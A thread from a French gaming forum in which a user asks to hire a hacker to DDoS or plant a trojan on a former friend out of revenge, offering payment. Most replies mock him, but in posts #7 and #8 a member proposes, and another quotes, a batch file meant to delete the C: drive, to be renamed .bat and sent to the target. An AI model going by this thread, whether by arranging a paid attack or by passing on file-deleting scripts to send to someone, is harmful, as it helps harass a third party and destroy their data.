• Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr - RealityGaming

Résolu bonjour je recherche un Hacker .

Inscrit
11 Mai 2013
J'aime
0
Reply from media Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #1
bonjour je recherche un Hacker pour attaquer un ancien pote qui ma fait des truc pas très sympas , a moi et a ma famille , je recherche un hacker pour le ddos ou je c'est pas , je pourais vous payer par strapass si vous le voullé . Mais je veux une preuve que vous le ferier et que je me ferais pas arnaquer .

Panda CSS

Membre Premium
Premium
Inscrit
4 Janvier 2013
J'aime
26
Reply from Panda CSS Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #2
Les posts comme ça , c'est trop bien ! -- , non mais serieux bonne vieille méthode tu vas chez lui et tu l'attrape

Tanguo

{SHOP VERIFIER}
Premium
Inscrit
8 Novembre 2011
J'aime
734
Reply from Tanguo Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #3
bonjour je recherche un Hacker pour attaquer un ancien pote qui ma fait des truc pas très sympas , a moi et a ma famille , je recherche un hacker pour le ddos ou je c'est pas , je pourais vous payer par strapass si vous le voullé . Mais je veux une preuve que vous le ferier et que je me ferais pas arnaquer .
Un bon Hacker pour toi c'est savoir DDOS ?
Je vois qu'il y a du niveau quand même !

Panda CSS

Membre Premium
Premium
Inscrit
4 Janvier 2013
J'aime
26
Reply from Panda CSS Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #4
Non mais attend , Clique droit , inspectez élément , et t'es hackeur maitenant

Inscrit
11 Mai 2013
J'aime
0
Reply from media Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #5
non mais du genre le pénétré lui envoyer un cheval de troie Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :p - RealityGaming

Tanguo

{SHOP VERIFIER}
Premium
Inscrit
8 Novembre 2011
J'aime
734
Reply from Tanguo Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #6

Panda CSS

Membre Premium
Premium
Inscrit
4 Janvier 2013
J'aime
26
Reply from Panda CSS Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #7
Au pire tu veux le faire chier ?

Colle sa dans le bloc note :

@echo off
del C:/
stop

et rename l'extension en .bat

Et envoi lui

Tanguo

{SHOP VERIFIER}
Premium
Inscrit
8 Novembre 2011
J'aime
734
Reply from Tanguo Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #8
Au pire tu veux le faire chier ?

Colle sa dans le bloc note :

@echo off
del C:/
stop

et rename l'extension en .bat

Et envoi lui
C'est un .BAT c'est nul, mais pour pour lui je pense que tu devien un gros hacker avec sa !

Panda CSS

Membre Premium
Premium
Inscrit
4 Janvier 2013
J'aime
26
Reply from Panda CSS Forums généraux Informatique Windows Questions, aides et recherches Résolu : bonjour je recherche un Hacker . #9